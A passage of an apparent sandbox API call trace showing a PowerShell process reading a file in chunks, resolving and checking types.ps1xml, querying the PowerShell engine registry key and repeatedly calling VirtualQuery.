0x0 [0150.519] GetFileType (hFile=0x358) returned 0x1 [0150.519] SetErrorMode (uMode=0x1) returned 0x1 [0150.519] GetFileType (hFile=0x358) returned 0x1 [0150.519] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.535] GetLastError () returned 0x0 [0150.535] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.535] GetLastError () returned 0x0 [0150.535] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.535] GetLastError () returned 0x0 [0150.536] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.536] GetLastError () returned 0x0 [0150.536] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.536] GetLastError () returned 0x0 [0150.537] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.537] GetLastError () returned 0x0 [0150.537] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.537] GetLastError () returned 0x0 [0150.537] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.537] GetLastError () returned 0x0 [0150.537] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.537] GetLastError () returned 0x0 [0150.538] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.538] GetLastError () returned 0x0 [0150.538] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.538] GetLastError () returned 0x0 [0150.538] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.538] GetLastError () returned 0x0 [0150.539] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.539] GetLastError () returned 0x0 [0150.539] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.539] GetLastError () returned 0x0 [0150.539] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.539] GetLastError () returned 0x0 [0150.539] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.539] GetLastError () returned 0x0 [0150.539] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.539] GetLastError () returned 0x0 [0150.541] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.541] GetLastError () returned 0x0 [0150.541] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.541] GetLastError () returned 0x0 [0150.542] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.542] GetLastError () returned 0x0 [0150.542] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.542] GetLastError () returned 0x0 [0150.542] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.542] GetLastError () returned 0x0 [0150.542] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.542] GetLastError () returned 0x0 [0150.542] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.542] GetLastError () returned 0x0 [0150.542] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.543] GetLastError () returned 0x0 [0150.543] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.543] GetLastError () returned 0x0 [0150.543] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.543] GetLastError () returned 0x0 [0150.543] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.543] GetLastError () returned 0x0 [0150.543] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.543] GetLastError () returned 0x0 [0150.544] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.544] GetLastError () returned 0x0 [0150.544] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.544] GetLastError () returned 0x0 [0150.544] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.544] GetLastError () returned 0x0 [0150.544] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.544] GetLastError () returned 0x0 [0150.548] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.548] GetLastError () returned 0x0 [0150.548] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.548] GetLastError () returned 0x0 [0150.548] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.548] GetLastError () returned 0x0 [0150.548] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.548] GetLastError () returned 0x0 [0150.548] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.549] GetLastError () returned 0x0 [0150.549] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.549] GetLastError () returned 0x0 [0150.549] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.549] GetLastError () returned 0x0 [0150.549] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1000, lpOverlapped=0x0) returned 1 [0150.549] GetLastError () returned 0x0 [0150.549] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x1b4, lpOverlapped=0x0) returned 1 [0150.549] GetLastError () returned 0x0 [0150.549] ReadFile (in: hFile=0x358, lpBuffer=0x2c6537c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12e824, lpOverlapped=0x0 | out: lpBuffer=0x2c6537c*, lpNumberOfBytesRead=0x12e824*=0x0, lpOverlapped=0x0) returned 1 [0150.549] GetLastError () returned 0x0 [0150.550] CloseHandle (hObject=0x358) returned 1 [0150.550] GetLastError () returned 0x0 [0150.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12e384, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0150.550] GetLastError () returned 0x0 [0150.550] SetErrorMode (uMode=0x1) returned 0x1 [0150.550] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2c85c0c | out: lpFileInformation=0x2c85c0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0150.550] GetLastError () returned 0x0 [0150.550] SetErrorMode (uMode=0x1) returned 0x1 [0150.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0150.550] GetLastError () returned 0x0 [0150.550] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12e7a8 | out: phkResult=0x12e7a8*=0x358) returned 0x0 [0150.550] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e7f0, lpData=0x0, lpcbData=0x12e7ec*=0x0 | out: lpType=0x12e7f0*=0x1, lpData=0x0, lpcbData=0x12e7ec*=0x56) returned 0x0 [0150.551] RegQueryValueExW (in: hKey=0x358, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12e7f0, lpData=0x509ca8, lpcbData=0x12e7ec*=0x56 | out: lpType=0x12e7f0*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x12e7ec*=0x56) returned 0x0 [0150.551] RegCloseKey (hKey=0x358) returned 0x0 [0150.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12e350, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0150.551] GetLastError () returned 0x0 [0150.551] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x12e2e4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0150.551] GetLastError () returned 0x0 [0151.037] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.113] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.114] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.115] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.115] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.115] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.116] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.118] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.135] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.135] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.135] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.135] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.136] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.136] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.136] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.136] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.141] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.145] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.146] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.146] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.146] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.147] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.148] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.148] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.148] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.149] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.149] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.149] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.149] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.149] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.151] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.154] VirtualQuery (in: lpAddress=0x12d6e8, lpBuffer=0x12e6e8, dwLength=0x1c | out: lpBuffer=0x12e6e8*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.154] VirtualQuery (in: lpAddress=0x12d6e8, lpBuffer=0x12e6e8, dwLength=0x1c | out: lpBuffer=0x12e6e8*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.154] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.156] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.266] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.266] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.266] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.287] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x509ca8, nSize=0x80 | out: lpBuffer="") returned 0x0 [0151.287] GetLastError () returned 0xcb [0151.323] VirtualQuery (in: lpAddress=0x12d6e4, lpBuffer=0x12e6e4, dwLength=0x1c | out: lpBuffer=0x12e6e4*(BaseAddress=0x12d000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, 